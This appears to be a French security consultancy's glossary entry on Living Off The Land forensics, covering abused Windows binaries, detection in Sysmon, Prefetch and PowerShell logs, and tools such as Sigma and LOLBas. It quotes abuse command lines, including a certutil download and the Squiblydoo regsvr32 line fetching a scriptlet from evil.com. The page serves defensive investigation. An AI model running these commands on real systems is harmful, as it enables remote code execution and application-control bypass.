Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

Living Off The Land Forensics

forensics

Définition

Le Living Off The Land (LOtL ou LotL) est une stratégie d'attaque consistant à utiliser exclusivement des outils légitimes présents dans l'environnement cible (commandes Windows intégrées, scripts PowerShell, outils d'administration) pour accomplir les objectifs d'attaque, plutôt que d'introduire des outils malveillants détectables. La forensique LOtL consiste à identifier ces abus d'outils légitimes dans les artefacts d'investigation. Les binaires Windows nativement présents et fréquemment abusés (LOLBins — Living Off the Land Binaries) incluent : certutil.exe (téléchargement de fichiers : certutil -urlcache -f URL dest, encodage/décodage base64), mshta.exe (exécution de scripts HTML malveillants : mshta.exe javascript:...), regsvr32.exe (chargement de scripts COM distants via AppLocker bypass : regsvr32 /s /n /u /i:http://evil.com/scrobj.dll scrobj.dll, technique dite squiblydoo), wscript.exe et cscript.exe (exécution de VBScript/JScript malveillants), bitsadmin.exe (téléchargement de fichiers via BITS), rundll32.exe (exécution de DLLs : rundll32 shell32.dll,OpenAs_RunDLL), et powershell.exe avec ses nombreuses capacités offensives. La détection LOtL dans les Event Logs est rendue difficile par le fait que ces binaires ont des usages légitimes abondants. Les signatures de détection doivent se concentrer sur les anomalies : certutil utilisé en dehors du département IT, mshta.exe lancé par un processus non-navigateur, regsvr32 avec des arguments pointant vers des URLs, ou PowerShell avec des arguments encodés en Base64. Sysmon (EventID 1, Process Create) est la source principale pour la détection LOtL : il capture la ligne de commande complète de chaque processus, incluant les arguments suspects. Les Sigma rules pour les LOLBins (voir la base de règles sigma-rules.github.io) mappent les patterns LOtL connus vers des requêtes SIEM exploitables. La base de données LOLBas (Living Off The Land Binaries And Scripts, lolbas-project.github.io) documente exhaustivement tous les binaires Windows avec leurs techniques d'abus et des exemples de détection. Le Prefetch est aussi une source précieuse : les exécutions de certutil, mshta, wscript avec des timestamps proches d'un incident révèlent des abus LOtL même si les process logs ont été effacés.

Fonctionnement

LOtL exploite la confiance accordée aux binaires signum par Microsoft et présents par défaut dans Windows. Les mécanismes de défense (AppLocker, WDAC) permettent souvent ces binaires par défaut. Les proxies réseau autorisent les connexions initiées par mshta.exe ou certutil.exe comme du trafic légitime. L'absence de fichiers malveillants sur disque complique la détection par les antivirus basés sur les signatures de fichiers.

Application DFIR

Investigation LOtL : 1) Prefetch : PECmd → certutil.exe, mshta.exe, wscript.exe exécutés récemment ?, 2) Sysmon EventID 1 : commandes complètes avec arguments suspects (certutil -urlcache, mshta javascript:, regsvr32 /i:http), 3) Amcache/ShimCache : tracer l'exécution des LOLBins dans le temps, 4) PowerShell Script Block Logging (EventID 4104) : payloads encodés Base64, DownloadString, 5) DNS logs : résolutions depuis des processus LOtL vers des domaines externes suspects. Corréler avec les IOCs et la timeline d'incident.

Outils

LOLBas database (lolbas-project.github.io, exhaustif), LOLOL (Living Off the Land Operators' Lifecycle, mwrlabs). Détection Sigma : github.com/SigmaHQ/sigma (LOLBins rules), DeepBlueCLI (PowerShell + LOLBins detection). Forensique LOtL : ShimCache/AmCache (exécutions LOLBins), Sysmon + ELK stack, OSSEC (Linux LOTL detection). Training : SANS FOR508 (LOtL detection labs), MITRE ATT&CK sub-techniques T1059 (command and scripting interpreter).

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis